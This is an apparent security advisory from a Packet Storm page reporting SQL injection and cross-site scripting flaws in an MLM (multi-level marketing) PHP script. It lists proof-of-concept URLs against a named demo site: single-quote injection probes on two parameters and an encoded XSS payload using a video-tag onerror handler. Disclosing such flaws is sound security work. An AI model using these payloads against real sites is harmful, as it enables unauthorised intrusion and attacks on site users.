MLM (Multi Level Marketing) script suffers from remote SQL injection and cross site scripting vulnerabilities.
3cea3e565701542fb819e5b8868b46f8e4a30b431ab8eef2f15a310434904029##################################################################################
_____ _ _ _ _____
| __ \ | | | | (_) / ____|
| |__) |_____ _____ | |_ _| |_ _ ___ _ __ | (___ ___ ___
| _ // _ \ \ / / _ \| | | | | __| |/ _ \| '_ \ \___ \ / _ \/ __|
| | \ \ __/\ V / (_) | | |_| | |_| | (_) | | | | ____) | __/ (__
|_| \_\___| \_/ \___/|_|\__,_|\__|_|\___/|_| |_| |_____/ \___|\___|
##################################################################################
MLM (Multi Level Marketing) Script, Multiple Vulnerabilities
Product Page: http://www.mlmscript.in/
Script Demo: http://www.mlmscript.in/product/version2
Author(Pentester): 3spi0n
On Web: RevolutionSec.Com - GraySecure.Org
On Social: Twitter.Com/eyyamgudeer
##################################################################################
[1] SQL Injection Vulnerabilities on Demo Site
[+] (productview.php, prdid Param)
>>> http://www.mlmscript.in/product/version2/productview.php?prdid='1
[+] (productview.php, uid param)
>>> http://www.mlmscript.in/product/version2/profileview.php?uid='1
[2] Xss (Cross Site Scripting) Vulnerability on Demo Site
[+] (regcheck_email.php, email param)
>>> http://www.mlmscript.in/product/version2/regcheck_email.php?email=%3Cvideo%3E%3Csource%20onerror%3d%22javascript%3aprompt%28912327%29%22%3E
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed